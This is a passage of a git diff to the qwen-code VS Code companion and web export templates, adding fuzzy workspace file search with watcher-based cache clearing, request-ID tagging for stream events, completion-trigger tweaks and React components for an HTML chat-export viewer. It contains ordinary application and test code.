).IS_REACT_ACT_ENVIRONMENT = true; + Object.defineProperty(HTMLElement.prototype, 'scrollIntoView', { + configurable: true, + value: vi.fn(), + }); + }); + + afterEach(() => { + if (root) { + act(() => { + root?.unmount(); + }); + root = null; + } + if (container) { + container.remove(); + container = null; + } + }); + + it('uses onCompletionFill for Tab without triggering onCompletionSelect', () => { + const rendered = renderInputForm(); + root = rendered.root; + container = rendered.container; + + act(() => { + document.dispatchEvent( + new KeyboardEvent('keydown', { + key: 'Tab', + bubbles: true, + cancelable: true, + }), + ); + }); + + expect(rendered.onCompletionFill).toHaveBeenCalledWith(completionItem); + expect(rendered.onCompletionSelect).not.toHaveBeenCalled(); + }); + + it('keeps Enter mapped to onCompletionSelect', () => { + const rendered = renderInputForm(); + root = rendered.root; + container = rendered.container; + + act(() => { + document.dispatchEvent( + new KeyboardEvent('keydown', { + key: 'Enter', + bubbles: true, + cancelable: true, + }), + ); + }); + + expect(rendered.onCompletionSelect).toHaveBeenCalledWith(completionItem); + expect(rendered.onCompletionFill).not.toHaveBeenCalled(); + }); +}); diff --git a/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx index cb747aff3..809f80dbc 100644 --- a/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx +++ b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx @@ -13,6 +13,7 @@ import type { InputFormProps as BaseInputFormProps, EditModeInfo, } from '@qwen-code/webui'; +import type { CompletionItem } from '../../../types/completionItemTypes.js'; import { getApprovalModeInfoFromString } from '../../../types/acpTypes.js'; import type { ApprovalModeValue } from '../../../types/approvalModeValueTypes.js'; import type { ModelInfo } from '@agentclientprotocol/sdk'; @@ -22,9 +23,11 @@ import { ModelSelector } from './ModelSelector.js'; * Extended props that accept ApprovalModeValue and ModelSelector */ export interface InputFormProps - extends Omit { + extends Omit { /** Edit mode value (local type) */ editMode: ApprovalModeValue; + /** Completion fill callback (Tab or equivalent) */ + onCompletionFill?: (item: CompletionItem) => void; /** Whether to show model selector */ showModelSelector?: boolean; /** Available models for selection */ diff --git a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts index 8cccae79e..d6ff4c4a9 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts +++ b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts @@ -11,6 +11,11 @@ import { FileMessageHandler } from './FileMessageHandler.js'; import * as vscode from 'vscode'; const shouldIgnoreFileMock = vi.hoisted(() => vi.fn()); +const fileSearchMock = vi.hoisted(() => ({ + initialize: vi.fn(), + search: vi.fn(), +})); + const vscodeMock = vi.hoisted(() => { class Uri { fsPath: string; @@ -20,6 +25,9 @@ const vscodeMock = vi.hoisted(() => { static file(fsPath: string) { return new Uri(fsPath); } + static joinPath(base: Uri, ...pathSegments: string[]) { + return new Uri(`${base.fsPath}/${pathSegments.join('/')}`); + } } return { @@ -28,7 +36,14 @@ const vscodeMock = vi.hoisted(() => { findFiles: vi.fn(), getWorkspaceFolder: vi.fn(), asRelativePath: vi.fn(), - workspaceFolders: [], + workspaceFolders: [] as vscode.WorkspaceFolder[], + createFileSystemWatcher: vi.fn(() => ({ + onDidCreate: vi.fn(), + onDidDelete: vi.fn(), + onDidChange: vi.fn(), + dispose: vi.fn(), + })), + onDidChangeWorkspaceFolders: vi.fn(() => ({ dispose: vi.fn() })), }, window: { activeTextEditor: undefined, @@ -50,13 +65,67 @@ vi.mock( }, }), ); +vi.mock('@qwen-code/qwen-code-core/src/utils/filesearch/fileSearch.js', () => ({ + FileSearchFactory: { + create: () => fileSearchMock, + }, +})); +vi.mock('@qwen-code/qwen-code-core/src/utils/filesearch/crawlCache.js', () => ({ + clear: vi.fn(), +})); describe('FileMessageHandler', () => { beforeEach(() => { vi.clearAllMocks(); }); - it('filters ignored paths and includes request metadata in workspace files', async () => { + it('searches files using fuzzy search when query is provided', async () => { + const rootPath = '/workspace'; + + vscodeMock.workspace.workspaceFolders = [ + { uri: vscode.Uri.file(rootPath), name: 'workspace', index: 0 }, + ]; + + fileSearchMock.initialize.mockResolvedValue(undefined); + fileSearchMock.search.mockResolvedValue([ + 'src/test.txt', + 'docs/readme.txt', + ]); + + const sendToWebView = vi.fn(); + const handler = new FileMessageHandler( + {} as QwenAgentManager, + {} as ConversationStore, + null, + sendToWebView, + ); + + await handler.handle({ + type: 'getWorkspaceFiles', + data: { query: 'txt', requestId: 7 }, + }); + + expect(fileSearchMock.search).toHaveBeenCalledWith('txt', { + maxResults: 50, + }); + + expect(sendToWebView).toHaveBeenCalledTimes(1); + const payload = sendToWebView.mock.calls[0]?.[0] as { + type: string; + data: { + files: Array<{ path: string }>; + query?: string; + requestId?: number; + }; + }; + + expect(payload.type).toBe('workspaceFiles'); + expect(payload.data.requestId).toBe(7); + expect(payload.data.query).toBe('txt'); + expect(payload.data.files).toHaveLength(2); + }); + + it('filters ignored paths in non-query mode', async () => { const rootPath = '/workspace'; const allowedPath = `${rootPath}/allowed.txt`; const ignoredPath = `${rootPath}/ignored.log`; @@ -64,6 +133,7 @@ describe('FileMessageHandler', () => { const allowedUri = vscode.Uri.file(allowedPath); const ignoredUri = vscode.Uri.file(ignoredPath); + vscodeMock.workspace.workspaceFolders = []; vscodeMock.workspace.findFiles.mockResolvedValue([allowedUri, ignoredUri]); vscodeMock.workspace.getWorkspaceFolder.mockImplementation(() => ({ uri: vscode.Uri.file(rootPath), @@ -86,21 +156,22 @@ describe('FileMessageHandler', () => { await handler.handle({ type: 'getWorkspaceFiles', - data: { query: 'txt', requestId: 7 }, + data: { requestId: 7 }, }); expect(vscodeMock.workspace.findFiles).toHaveBeenCalledWith( - '**/*[tT][xX][tT]*', + '**/*', '**/{.git,node_modules}/**', - 50, + 20, ); expect(shouldIgnoreFileMock).toHaveBeenCalledWith(ignoredPath, { respectGitIgnore: true, respectQwenIgnore: false, }); - expect(sendToWebView).toHaveBeenCalledTimes(1); - const payload = sendToWebView.mock.calls[0]?.[0] as { + const payload = sendToWebView.mock.calls[ + sendToWebView.mock.calls.length - 1 + ]?.[0] as { type: string; data: { files: Array<{ path: string }>; @@ -111,8 +182,5 @@ describe('FileMessageHandler', () => { expect(payload.type).toBe('workspaceFiles'); expect(payload.data.requestId).toBe(7); - expect(payload.data.query).toBe('txt'); - expect(payload.data.files).toHaveLength(1); - expect(payload.data.files[0]?.path).toBe(allowedPath); }); }); diff --git a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts index 4e6e43575..f8708d8d4 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts +++ b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts @@ -14,6 +14,11 @@ import { } from '../../utils/editorGroupUtils.js'; import { ReadonlyFileSystemProvider } from '../../services/readonlyFileSystemProvider.js'; import { FileDiscoveryService } from '@qwen-code/qwen-code-core/src/services/fileDiscoveryService.js'; +import { + FileSearchFactory, + type FileSearch, +} from '@qwen-code/qwen-code-core/src/utils/filesearch/fileSearch.js'; +import * as crawlCache from '@qwen-code/qwen-code-core/src/utils/filesearch/crawlCache.js'; import { getErrorMessage } from '../../utils/errorMessage.js'; /** @@ -25,6 +30,9 @@ export class FileMessageHandler extends BaseMessageHandler { string, FileDiscoveryService >(); + private readonly fileSearchInstances = new Map(); + private readonly fileSearchInitializing = new Map>(); + private readonly fileWatchers = new Map(); private readonly globSpecialChars = new Set([ '\\', '*', @@ -51,6 +59,122 @@ export class FileMessageHandler extends BaseMessageHandler { ].includes(messageType); } + private async getOrCreateFileSearch( + rootPath: string, + ): Promise { + const existing = this.fileSearchInstances.get(rootPath); + if (existing) { + return existing; + } + + const initializing = this.fileSearchInitializing.get(rootPath); + if (initializing) { + await initializing; + return this.fileSearchInstances.get(rootPath) ?? null; + } + + const initPromise = (async () => { + const search = FileSearchFactory.create({ + projectRoot: rootPath, + ignoreDirs: ['.git', 'node_modules'], + useGitignore: true, + useQwenignore: false, + cache: true, + cacheTtl: 30000, + enableRecursiveFileSearch: true, + enableFuzzySearch: true, + }); + await search.initialize(); + this.fileSearchInstances.set(rootPath, search); + })(); + + this.fileSearchInitializing.set(rootPath, initPromise); + + try { + await initPromise; + return this.fileSearchInstances.get(rootPath) ?? null; + } catch (error) { + this.fileSearchInitializing.delete(rootPath); + console.error( + '[FileMessageHandler] Failed to initialize file search:', + error, + ); + return null; + } + } + + private clearFileSearchCache(rootPath: string): void { + this.fileSearchInstances.delete(rootPath); + this.fileSearchInitializing.delete(rootPath); + crawlCache.clear(); + console.log( + '[FileMessageHandler] Cleared file search cache, trigger:', + rootPath, + ); + } + + private createWatcherForFolder(folder: vscode.WorkspaceFolder): void { + const rootPath = folder.uri.fsPath; + + // Skip if watcher already exists for this folder + if (this.fileWatchers.has(rootPath)) { + return; + } + + const watcher = vscode.workspace.createFileSystemWatcher( + new vscode.RelativePattern(folder, '**/*'), + ); + + const onFileAddOrDelete = () => this.clearFileSearchCache(rootPath); + watcher.onDidCreate(onFileAddOrDelete); + watcher.onDidDelete(onFileAddOrDelete); + // Note: onDidChange is not needed - file search is based on names, not content + + this.fileWatchers.set(rootPath, watcher); + } + + private disposeWatcherForFolder(rootPath: string): void { + const watcher = this.fileWatchers.get(rootPath); + if (watcher) { + watcher.dispose(); + this.fileWatchers.delete(rootPath); + } + } + + setupFileWatchers(): vscode.Disposable { + const workspaceFolders = vscode.workspace.workspaceFolders; + if (workspaceFolders) { + for (const folder of workspaceFolders) { + this.createWatcherForFolder(folder); + } + } + + const foldersChangeListener = vscode.workspace.onDidChangeWorkspaceFolders( + (e) => { + for (const folder of e.removed) { + const rootPath = folder.uri.fsPath; + this.clearFileSearchCache(rootPath); + this.disposeWatcherForFolder(rootPath); + } + for (const folder of e.added) { + const rootPath = folder.uri.fsPath; + this.clearFileSearchCache(rootPath); + this.createWatcherForFolder(folder); + } + }, + ); + + return { + dispose: () => { + for (const watcher of this.fileWatchers.values()) { + watcher.dispose(); + } + this.fileWatchers.clear(); + foldersChangeListener.dispose(); + }, + }; + } + async handle(message: { type: string; data?: unknown }): Promise { const data = message.data as Record | undefined; @@ -282,20 +406,43 @@ export class FileMessageHandler extends BaseMessageHandler { // Search or show recent files if (query) { - const includePattern = `**/*${this.buildCaseInsensitiveGlob(query)}*`; - // Query mode: perform filesystem search (may take longer on large workspaces) console.log( - '[FileMessageHandler] Searching workspace files for query', + '[FileMessageHandler] Searching workspace files with fuzzy search for query', query, ); - const uris = await vscode.workspace.findFiles( - includePattern, - '**/{.git,node_modules}/**', - 50, - ); - for (const uri of uris) { - addFile(uri); + const workspaceFolders = vscode.workspace.workspaceFolders; + if (workspaceFolders) { + for (const folder of workspaceFolders) { + const rootPath = folder.uri.fsPath; + const fileSearch = await this.getOrCreateFileSearch(rootPath); + if (!fileSearch) { + continue; + } + + const relativePaths = await fileSearch.search(query, { + maxResults: 50, + }); + + for (let relativePath of relativePaths) { + const isDirectory = relativePath.endsWith('/'); + if (isDirectory) { + relativePath = relativePath.slice(0, -1); + } + const absolutePath = vscode.Uri.joinPath( + folder.uri, + relativePath, + ).fsPath; + + files.push({ + id: absolutePath, + label: relativePath, + description: relativePath, + path: absolutePath, + }); + addedPaths.add(absolutePath); + } + } } } else { // Non-query mode: respond quickly with currently active and open files diff --git a/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts b/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts index 9cb401b43..2f1b862cc 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts +++ b/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type * as vscode from 'vscode'; import type { IMessageHandler } from './BaseMessageHandler.js'; import type { QwenAgentManager } from '../../services/qwenAgentManager.js'; import type { ConversationStore } from '../../services/conversationStore.js'; @@ -24,6 +25,7 @@ export class MessageRouter { private handlers: IMessageHandler[] = []; private sessionHandler: SessionMessageHandler; private authHandler: AuthMessageHandler; + private fileHandler: FileMessageHandler; private currentConversationId: string | null = null; private permissionHandler: | ((message: PermissionResponseMessage) => void) @@ -48,7 +50,7 @@ export class MessageRouter { sendToWebView, ); - const fileHandler = new FileMessageHandler( + this.fileHandler = new FileMessageHandler( agentManager, conversationStore, currentConversationId, @@ -72,12 +74,16 @@ export class MessageRouter { // Register handlers in order of priority this.handlers = [ this.sessionHandler, - fileHandler, + this.fileHandler, editorHandler, this.authHandler, ]; } + setupFileWatchers(): vscode.Disposable { + return this.fileHandler.setupFileWatchers(); + } + /** * Route message to appropriate handler */ diff --git a/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts b/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts index 4afac9273..e03a0e28d 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts +++ b/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts @@ -160,16 +160,49 @@ export class SessionMessageHandler extends BaseMessageHandler { } /** - * Notify the webview that streaming has finished. + * Monotonically increasing request counter used to tag streamStart/streamEnd + * so the WebView can detect and discard stale events from previous requests. */ - private sendStreamEnd(reason?: string): void { - const data: { timestamp: number; reason?: string } = { + private requestCounter = 0; + private currentRequestId: string | null = null; + private streamEndSent = false; + + /** + * Notify the webview that streaming has finished. + * Includes the `requestId` so the webview can ignore stale events. + * Guarded by `streamEndSent` to prevent duplicate streamEnd for the + * same request (e.g. cancel handler + error handler both sending one). + * + * @param reason Optional reason string (e.g. 'user_cancelled'). + * @param forRequestId When provided, the call is scoped to a specific + * request invocation. If a newer request has since overwritten + * `this.currentRequestId`, the call is silently dropped — this + * prevents a stale `handleSendMessage` invocation (resumed after + * cancellation) from emitting a streamEnd tagged as the newer request. + */ + private sendStreamEnd(reason?: string, forRequestId?: string): void { + if (this.streamEndSent) { + return; + } + // If the caller captured a request ID, only proceed when it still + // matches the active request. A mismatch means a newer request has + // taken over the shared state; emitting now would incorrectly tag + // the event with the newer request's ID. + if (forRequestId && this.currentRequestId !== forRequestId) { + return; + } + this.streamEndSent = true; + + const data: { timestamp: number; reason?: string; requestId?: string } = { timestamp: Date.now(), }; if (reason) { data.reason = reason; } + if (this.currentRequestId) { + data.requestId = this.currentRequestId; + } this.sendToWebView({ type: 'streamEnd', @@ -388,12 +421,28 @@ export class SessionMessageHandler extends BaseMessageHandler { } // Send to agent + // + // Generate a unique requestId so the webview can correlate + // streamStart/streamEnd and discard stale events. + this.requestCounter += 1; + this.currentRequestId = `req-${this.requestCounter}-${Date.now()}`; + this.streamEndSent = false; + + // Capture locally so that if a newer handleSendMessage() overwrites + // the shared fields while we are awaiting, our sendStreamEnd calls + // will detect the mismatch and silently no-op instead of emitting + // a streamEnd tagged with the newer request's ID. + const myRequestId = this.currentRequestId; + try { this.resetStreamContent(); this.sendToWebView({ type: 'streamStart', - data: { timestamp: Date.now() }, + data: { + timestamp: Date.now(), + requestId: myRequestId, + }, }); await this.agentManager.sendMessage(formattedText); @@ -411,7 +460,7 @@ export class SessionMessageHandler extends BaseMessageHandler { ); } - this.sendStreamEnd(); + this.sendStreamEnd(undefined, myRequestId); } catch (error) { console.error('[SessionMessageHandler] Error sending message:', error); @@ -433,7 +482,7 @@ export class SessionMessageHandler extends BaseMessageHandler { if (isAbortLike) { // Do not show VS Code error popup for intentional cancellations. // Ensure the webview knows the stream ended due to user action. - this.sendStreamEnd('user_cancelled'); + this.sendStreamEnd('user_cancelled', myRequestId); return; } // Check for session not found error and handle it appropriately @@ -451,7 +500,7 @@ export class SessionMessageHandler extends BaseMessageHandler { type: 'sessionExpired', data: { message: 'Session expired. Please login again.' }, }); - this.sendStreamEnd('session_expired'); + this.sendStreamEnd('session_expired', myRequestId); } else { const isTimeoutError = lower.includes('timeout') || lower.includes('timed out'); @@ -474,7 +523,7 @@ export class SessionMessageHandler extends BaseMessageHandler { type: 'message', data: timeoutMessage, }); - this.sendStreamEnd('timeout'); + this.sendStreamEnd('timeout', myRequestId); } else { // Handling of Non-Timeout Errors vscode.window.showErrorMessage(`Error sending message: ${errorMsg}`); @@ -482,7 +531,7 @@ export class SessionMessageHandler extends BaseMessageHandler { type: 'error', data: { message: errorMsg }, }); - this.sendStreamEnd('error'); + this.sendStreamEnd('error', myRequestId); } } } @@ -790,21 +839,15 @@ export class SessionMessageHandler extends BaseMessageHandler { // Cancel the current streaming operation in the agent manager await this.agentManager.cancelCurrentPrompt(); - // Send streamEnd message to WebView to update UI - this.sendToWebView({ - type: 'streamEnd', - data: { timestamp: Date.now(), reason: 'user_cancelled' }, - }); + // Use sendStreamEnd to include requestId for proper correlation + this.sendStreamEnd('user_cancelled'); console.log('[SessionMessageHandler] Streaming cancelled successfully'); } catch (_error) { console.log('[SessionMessageHandler] Streaming cancelled (interrupted)'); - // Always send streamEnd to update UI, regardless of errors - this.sendToWebView({ - type: 'streamEnd', - data: { timestamp: Date.now(), reason: 'user_cancelled' }, - }); + // Use sendStreamEnd (with duplicate guard) to include requestId + this.sendStreamEnd('user_cancelled'); } } diff --git a/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts b/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts index 0f5296550..50344ac0e 100644 --- a/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts +++ b/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts @@ -123,10 +123,12 @@ export const useFileContext = (vscode: VSCodeAPI) => { ); /** - * Add file reference + * Add file reference (called when user selects a file from completion) + * Also resets the last query so that backspacing and re-typing will trigger a fresh search */ const addFileReference = useCallback((fileName: string, filePath: string) => { fileReferenceMap.current.set(fileName, filePath); + lastQueryRef.current = undefined; }, []); /** diff --git a/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts b/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts index f3a660366..6fad7cba5 100644 --- a/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts +++ b/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts @@ -305,10 +305,13 @@ export function useCompletionTrigger( let triggerPos = -1; let triggerChar: '@' | '/' | null = null; - if (lastAtMatch > lastSlashMatch) { + // Priority: @ trigger takes precedence over / trigger + // This allows path-like queries (e.g., "src/components/Button") in @ mentions + // But skip if the trigger is inside a file tag + if (lastAtMatch >= 0) { triggerPos = lastAtMatch; triggerChar = '@'; - } else if (lastSlashMatch > lastAtMatch) { + } else if (lastSlashMatch >= 0) { triggerPos = lastSlashMatch; triggerChar = '/'; } diff --git a/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts b/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts index 4400c54b4..52d1655e7 100644 --- a/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts +++ b/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts @@ -168,6 +168,9 @@ export const useWebViewMessages = ({ // keep the bottom "waiting" message visible until all of them complete. const activeExecToolCallsRef = useRef>(new Set()); const modelInfoRef = useRef(null); + // Track the active requestId from the latest streamStart so we can + // discard stale streamEnd events from cancelled/previous requests. + const activeRequestIdRef = useRef(null); // Use ref to store callbacks to avoid useEffect dependency issues const handlersRef = useRef({ sessionManagement, @@ -461,11 +464,15 @@ export const useWebViewMessages = ({ break; } - case 'streamStart': - handlers.messageHandling.startStreaming( - (message.data as { timestamp?: number } | undefined)?.timestamp, - ); + case 'streamStart': { + const startData = message.data as + | { timestamp?: number; requestId?: string } + | undefined; + // Store the requestId so we can validate streamEnd events + activeRequestIdRef.current = startData?.requestId ?? null; + handlers.messageHandling.startStreaming(startData?.timestamp); break; + } case 'streamChunk': { handlers.messageHandling.appendStreamChunk(message.data.chunk); @@ -479,6 +486,24 @@ export const useWebViewMessages = ({ } case 'streamEnd': { + const endData = message.data as + | { reason?: string; requestId?: string } + | undefined; + const endRequestId = endData?.requestId ?? null; + + // Drop stale or untagged streamEnd when a tagged stream is active. + if (activeRequestIdRef.current) { + if (endRequestId !== activeRequestIdRef.current) { + console.log( + '[useWebViewMessages] Ignoring stale/untagged streamEnd:', + endRequestId, + 'active:', + activeRequestIdRef.current, + ); + break; + } + } + // Always end local streaming state and clear thinking state handlers.messageHandling.endStreaming(); handlers.messageHandling.clearThinking(); @@ -488,9 +513,7 @@ export const useWebViewMessages = ({ // This avoids UI getting stuck with Stop button visible after // rejecting a permission request. try { - const reason = ( - (message.data as { reason?: string } | undefined)?.reason || '' - ).toLowerCase(); + const reason = (endData?.reason || '').toLowerCase(); /** * Handle different types of stream end reasons that require a full reset: diff --git a/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts b/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts index a06fd1a3b..d400fa727 100644 --- a/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts +++ b/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type * as vscode from 'vscode'; import type { QwenAgentManager } from '../../services/qwenAgentManager.js'; import type { ConversationStore } from '../../services/conversationStore.js'; import type { @@ -86,4 +87,8 @@ export class MessageHandler { appendStreamContent(chunk: string): void { this.router.appendStreamContent(chunk); } + + setupFileWatchers(): vscode.Disposable { + return this.router.setupFileWatchers(); + } } diff --git a/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts b/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts index e8e5e3f74..c54fa4af4 100644 --- a/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts +++ b/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts @@ -89,6 +89,10 @@ export class WebViewProvider { await this.forceReLogin(); }); + // Setup file watchers for cache invalidation + const fileWatcherDisposable = this.messageHandler.setupFileWatchers(); + this.disposables.push(fileWatcherDisposable); + // Setup agent callbacks this.agentManager.onMessage((message) => { // Do not suppress messages during checkpoint saves. diff --git a/packages/web-templates/package.json b/packages/web-templates/package.json index 066a3359e..fbedb34d0 100644 --- a/packages/web-templates/package.json +++ b/packages/web-templates/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/web-templates", - "version": "0.12.3", + "version": "0.13.0", "description": "Web templates bundled as embeddable JS/CSS strings", "repository": { "type": "git", diff --git a/packages/web-templates/src/export-html/src/components/CopyButton.tsx b/packages/web-templates/src/export-html/src/components/CopyButton.tsx new file mode 100644 index 000000000..4a390d50b --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/CopyButton.tsx @@ -0,0 +1,53 @@ +const React = window.React; + +export type CopyButtonProps = { + text: string; +}; + +export const CopyButton = ({ text }: CopyButtonProps) => { + const [copied, setCopied] = React.useState(false); + + const handleCopy = async () => { + try { + await navigator.clipboard.writeText(text); + setCopied(true); + setTimeout(() => setCopied(false), 2000); + } catch (err) { + console.error('Failed to copy:', err); + } + }; + + return ( + + ); +}; diff --git a/packages/web-templates/src/export-html/src/components/MetadataItem.tsx b/packages/web-templates/src/export-html/src/components/MetadataItem.tsx new file mode 100644 index 000000000..476ab7fe3 --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/MetadataItem.tsx @@ -0,0 +1,28 @@ +export type MetadataItemProps = { + label: string; + value?: string | number; + valueClass?: string; +}; + +export const MetadataItem = ({ + label, + value, + valueClass, +}: MetadataItemProps) => { + if (value === undefined || value === null || value === '') { + return null; + } + return ( +
+
+ {label} + + {value} + +
+
+ ); +}; diff --git a/packages/web-templates/src/export-html/src/components/MetadataSidebar.tsx b/packages/web-templates/src/export-html/src/components/MetadataSidebar.tsx new file mode 100644 index 000000000..ae5c5bd0c --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/MetadataSidebar.tsx @@ -0,0 +1,95 @@ +import type { ExportMetadata } from './types.js'; +import { MetadataItem } from './MetadataItem.js'; +import { + formatRelativeTime, + formatExportTime, + formatTokenLimit, +} from './utils.js'; + +export type MetadataSidebarProps = { + metadata: ExportMetadata; +}; + +export const MetadataSidebar = ({ metadata }: MetadataSidebarProps) => ( + +); diff --git a/packages/web-templates/src/export-html/src/components/hooks.ts b/packages/web-templates/src/export-html/src/components/hooks.ts new file mode 100644 index 000000000..f4dcd7be0 --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/hooks.ts @@ -0,0 +1,38 @@ +import type { PlatformContextValue } from './types.js'; +import { useModalState } from './TempFileModal.js'; + +const React = window.React; + +/** + * Hook to provide platform context for the export HTML viewer + */ +export const usePlatformContext = () => { + const { modalState, openModal, closeModal } = useModalState(); + + const platformContext = React.useMemo( + () => + ({ + platform: 'web' as PlatformContextValue['platform'], + postMessage: (message: unknown) => { + console.log('Posted message:', message); + }, + onMessage: (handler: (event: MessageEvent) => void) => { + window.addEventListener('message', handler); + return () => window.removeEventListener('message', handler); + }, + openFile: (path: string) => { + console.log('Opening file:', path); + }, + openTempFile: openModal, + getResourceUrl: () => undefined, + features: { + canOpenFile: false, + canOpenTempFile: true, + canCopy: true, + }, + }) satisfies PlatformContextValue, + [openModal], + ); + + return { platformContext, modalState, closeModal }; +}; diff --git a/packages/web-templates/src/export-html/src/components/types.ts b/packages/web-templates/src/export-html/src/components/types.ts new file mode 100644 index 000000000..3fb562ad3 --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/types.ts @@ -0,0 +1,46 @@ +/** + * Type definitions for export-html + */ + +export type ChatData = { + messages?: unknown[]; + sessionId?: string; + startTime?: string; + metadata?: ExportMetadata; +}; + +export type ExportMetadata = { + sessionId: string; + startTime: string; + exportTime: string; + cwd: string; + gitRepo?: string; + gitBranch?: string; + model?: string; + channel?: string; + promptCount: number; + contextUsagePercent?: number; + contextWindowSize?: number; + totalTokens?: number; + filesRead?: number; + filesWritten?: number; + linesAdded?: number; + linesRemoved?: number; + uniqueFiles: string[]; +}; + +export type PlatformContextValue = { + platform: 'web'; + postMessage: (message: unknown) => void; + onMessage: (handler: (event: MessageEvent) => void) => () => void; + openFile: (path: string) => void; + openTempFile?: (content: string, fileName?: string) => void; + getResourceUrl: () => string | undefined; + features: { + canOpenFile: boolean; + canOpenTempFile?: boolean; + canCopy: boolean; + }; +}; + +export type ChatViewerMessage = { type?: string } & Record; diff --git a/packages/web-templates/src/export-html/src/components/utils.ts b/packages/web-templates/src/export-html/src/components/utils.ts new file mode 100644 index 000000000..6aafc8acf --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/utils.ts @@ -0,0 +1,140 @@ +import type { ChatData, ChatViewerMessage } from './types.js'; + +/** + * Type guard for ChatViewerMessage + */ +export const isChatViewerMessage = ( + value: unknown, +): value is ChatViewerMessage => Boolean(value) && typeof value === 'object'; + +/** + * Parse chat data from the embedded script tag + */ +export const parseChatData = (): ChatData => { + const chatDataElement = document.getElementById('chat-data'); + if (!chatDataElement?.textContent) { + return {}; + } + + try { + const parsed = JSON.parse(chatDataElement.textContent) as unknown; + if (parsed && typeof parsed === 'object') { + return parsed as ChatData; + } + return {}; + } catch (error) { + console.error('Failed to parse chat data.', error); + return {}; + } +}; + +/** + * Format session date for display + */ +export const formatSessionDate = (startTime?: string | null) => { + if (!startTime) { + return '-'; + } + + try { + const date = new Date(startTime); + return date.toLocaleString('en-US', { + year: 'numeric', + month: 'short', + day: 'numeric', + hour: '2-digit', + minute: '2-digit', + }); + } catch { + return startTime; + } +}; + +/** + * Format export time for display + */ +export const formatExportTime = (exportTime?: string | null) => { + if (!exportTime) { + return '-'; + } + + try { + const date = new Date(exportTime); + return date.toLocaleString('en-US', { + year: 'numeric', + month: 'short', + day: 'numeric', + hour: '2-digit', + minute: '2-digit', + }); + } catch { + return exportTime; + } +}; + +/** + * Format relative time (e.g., "5 minutes ago") + */ +export const formatRelativeTime = (startTime?: string | null) => { + if (!startTime) { + return '-'; + } + + try { + const date = new Date(startTime); + const startTimestamp = date.getTime(); + if (Number.isNaN(startTimestamp)) { + return '-'; + } + const now = new Date(); + const diffMs = Math.max(0, now.getTime() - startTimestamp); + const diffSeconds = Math.floor(diffMs / 1000); + const diffMinutes = Math.floor(diffSeconds / 60); + const diffHours = Math.floor(diffMinutes / 60); + const diffDays = Math.floor(diffHours / 24); + const diffWeeks = Math.floor(diffDays / 7); + const diffMonths = Math.floor(diffDays / 30); + const diffYears = Math.floor(diffDays / 365); + + if (diffSeconds < 60) { + return 'just now'; + } else if (diffMinutes < 60) { + return `${diffMinutes} minute${diffMinutes === 1 ? '' : 's'} ago`; + } else if (diffHours < 24) { + return `${diffHours} hour${diffHours === 1 ? '' : 's'} ago`; + } else if (diffDays < 7) { + return `${diffDays} day${diffDays === 1 ? '' : 's'} ago`; + } else if (diffWeeks < 4) { + return `${diffWeeks} week${diffWeeks === 1 ? '' : 's'} ago`; + } else if (diffMonths < 12) { + return `${diffMonths} month${diffMonths === 1 ? '' : 's'} ago`; + } else { + return `${diffYears} year${diffYears === 1 ? '' : 's'} ago`; + } + } catch { + return '-'; + } +}; + +/** + * Format path with truncation + */ +export const formatPath = (path: string, maxLength: number = 40) => { + if (!path || path.length <= maxLength) return path; + return '...' + path.slice(-maxLength + 3); +}; + +/** + * Format token limit for display (e.g., 128k, 200k, 1m) + * Returns undefined if tokens is not provided. + */ +export const formatTokenLimit = (tokens?: number): string | undefined => { + if (tokens === undefined || tokens === null) return undefined; + if (tokens >= 1000000) { + return `${(tokens / 1000000).toFixed(tokens % 1000000 === 0 ? 0 : 1)}m`; + } + if (tokens >= 1000) { + return `${(tokens / 1000).toFixed(tokens % 1000 === 0 ? 